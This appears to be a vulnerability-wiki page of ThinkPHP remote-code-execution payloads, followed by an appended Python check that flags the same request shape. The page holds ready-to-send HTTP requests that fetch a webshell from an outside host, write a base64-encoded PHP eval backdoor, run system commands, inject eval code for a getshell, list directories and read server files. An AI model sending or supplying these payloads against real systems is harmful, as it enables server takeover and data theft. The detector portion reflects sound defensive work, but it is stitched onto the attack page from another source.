ThinkPHP Payload

A free, open vulnerability database that anyone can edit (PwnWiki.Com)

POST /index.php?s=captcha&&Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1
Host: aaa.kkt99.top
Content-Length: 76
Cache-Control: max-age=0
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=15c58ldpm65a12094fik2aul60; UM_distinctid=16ec5c84963499-0179aed780904e-2393f61-384000-16ec5c8496494d; CNZZDATA1271205468=1873186741-1575275639-%7C1575275639
Connection: close

_method=__construct&filter=assert&method=GET&server%5BREQUEST_METHOD%5D=Fuck
_method=construct&filter=assert&filter=file_put_contents('0.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4='))&server=-1

_method=__construct&filter=system&method=GET&get=whoami

_method=__construct&filter=assert&server=phpinfo&get=phpinfo 
or
_method=__construct&filter=call_user_func&server=phpinfo&get=phpinfo

PHP 7.4 Getshell:

POST /%3f><%3fphp%20eval($_GET1);%3f>/controller/Index.php?1=phpinfo(); HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

_method=__construct&method=GET&server=1&filter=think\Build::module&get=index//../../public//?><?php eval($_GET1);?>

Enumerate the target:

POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

_method=__construct&filter=scandir&filter=var_dump&method=GET&get=/www/wwwroot/adada.com/public/

PHP 7.4 arbitrary file read:

POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

_method=__construct&filter=highlight_file&method=GET&get=/www/wwwroot/adada.com/public/index.php
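
The request bodies on this page share one shape: a `_method` form field whose value is not an HTTP verb (`__construct`), sent together with `filter`, `method`, `server` or `get` fields. As an added example (not part of the original page), a Python check that flags that shape in logged POST bodies; the function names and sample bodies are constructed for illustration.

```python
from urllib.parse import parse_qsl

# HTTP verbs a method-override form field can legitimately carry.
ALLOWED_VERBS = {"GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS"}
# Fields sent next to _method in the request bodies on this page.
COMPANION_FIELDS = {"filter", "method", "server", "get"}


def parse_fields(body):
    """Decode a form-urlencoded body into {base_name: [values]}."""
    fields = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        # Treat server[REQUEST_METHOD] and server as the same field.
        base = name.split("[", 1)[0].strip().lower()
        fields.setdefault(base, []).append(value)
    return fields


def inspect_body(body, override_field="_method"):
    """Return findings for one POST body; an empty list means no match."""
    fields = parse_fields(body)
    bad = [v for v in fields.get(override_field, [])
           if v.strip().upper() not in ALLOWED_VERBS]
    if not bad:
        return []
    findings = ["override is not an HTTP verb: " + ", ".join(bad)]
    companions = sorted(COMPANION_FIELDS.intersection(fields))
    if companions:
        findings.append("companion fields: " + ", ".join(companions))
    if "filter" in fields:
        findings.append("filter values: " + ", ".join(fields["filter"]))
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "_method=PUT&title=hello",
    "filter=price&get=1",
    "_method=__construct&filter=var_dump&method=GET&server%5BREQUEST_METHOD%5D=x",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean", "<-", body)
```

A body is reported only when the override value falls outside the verb allowlist, so ordinary forms that happen to use a `filter` or `get` field are not flagged.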
